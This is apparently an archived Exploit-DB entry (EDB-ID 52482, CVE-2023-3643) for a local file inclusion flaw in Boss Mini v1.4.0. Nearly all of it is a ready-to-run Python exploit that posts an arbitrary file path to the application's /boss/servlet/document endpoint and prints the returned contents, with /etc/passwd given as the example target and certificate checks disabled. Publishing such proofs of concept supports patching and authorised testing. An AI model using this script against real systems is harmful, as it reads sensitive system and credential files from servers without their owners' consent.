← Back ⬡ Vulnerabilities & CVEs —

[webapps] Boss Mini v1.4.0 - Local File Inclusion (LFI)

Exploit DB Archived Mar 16, 2026 ✓ Full text saved

Boss Mini v1.4.0 - Local File Inclusion (LFI)

Full text archived locally

✦ AI Summary · Claude Sonnet

EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING Boss Mini v1.4.0 - Local File Inclusion (LFI) EDB-ID: 52482 CVE: 2023-3643 EDB Verified: Author: ANDERSONCEZAR048 Type: WEBAPPS Exploit: / Platform: MULTIPLE Date: 2026-03-03 Vulnerable App: # Exploit Title: Boss Mini v1.4.0 - Local File Inclusion (LFI) # Date: 07/12/2023 # Exploit Author: nltt0 # Version: 1.4.0 (Build 6221) # CVE: CVE-2023-3643 from requests import post from urllib.parse import quote from argparse import ArgumentParser banner = r""" _____ _ _____ / __ \ | | / ___| | / \/ __ _| | __ _ _ __ __ _ ___ ___ \ `--. | | / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \ | \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ / \____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/ __/ | |___/ by nltt0 [https://github.com/nltt-br] """ print(banner) try: parser = ArgumentParser(description='Local file inclusion [Boss Mini]') parser.add_argument('--domain', required=True, help='Application domain') parser.add_argument('--file', required=True, help='Local file') args = parser.parse_args() host = args.domain file = args.file url = '{}/boss/servlet/document'.format(host) file2 = quote(file, safe='') headers = { 'Host': host, 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0', 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange', 'Referer': 'https://{}/boss/app/report/popup.html?/etc/passwd'.format(host) } data = { 'path': file2 } try: req = post(url, headers=headers, data=data, verify=False) if req.status_code == 200: print(req.text) except Exception as e: print('Error in {}'.format(e)) except Exception as e: print('Error in {}'.format(e)) Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services

💬 Team Notes